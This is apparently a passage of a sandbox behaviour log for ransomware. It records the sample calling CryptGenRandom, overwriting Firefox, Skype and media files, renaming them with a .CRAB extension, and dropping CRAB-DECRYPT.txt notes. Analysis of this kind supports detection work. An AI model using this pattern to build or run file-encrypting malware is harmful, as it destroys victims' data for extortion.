| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, size = 1048576, size_out = 59 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, size = 64 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\.metadata-v2.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, size = 1048576, size_out = 335872 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, size = 335872 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, size = 1048576, size_out = 512 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, size = 512 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\storage.sqlite.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, size = 1048576, size_out = 29 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, size = 32 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\times.json.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, size = 1048576, size_out = 98304 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, size = 98304 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\webappsstore.sqlite.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, size = 1048576, size_out = 351 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, size = 352 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\xulstore.json.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 1048576, size_out = 122 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 128 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\profiles.ini.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, size = 1048576, size_out = 78822 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, size = 78832 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\NzZfBRffU.gif.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, size = 1048576, size_out = 102394 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, size = 102400 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\QO6C.pdf.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, size = 1048576, size_out = 76 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, size = 80 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Skype\RootTools\roottools.conf.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, size = 1048576, size_out = 92095 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, size = 92096 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\sLivwNIVhI-acv9KYt.wav.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, size = 1048576, size_out = 80846 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, size = 80848 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\sOc9HFGjfdRL.mp4.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, size = 1048576, size_out = 5903 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, size = 5904 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\ssWXjNJMpxPjy0RSh1p_.ots.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Sun\Java\Deployment\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, size = 1048576, size_out = 51106 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, size = 51120 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\TJzRR99g_04.bmp.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, size = 1048576, size_out = 89745 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, size = 89760 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\U1cYWKMQhIFnmv.png.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\vJP1qxGfwRfh.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
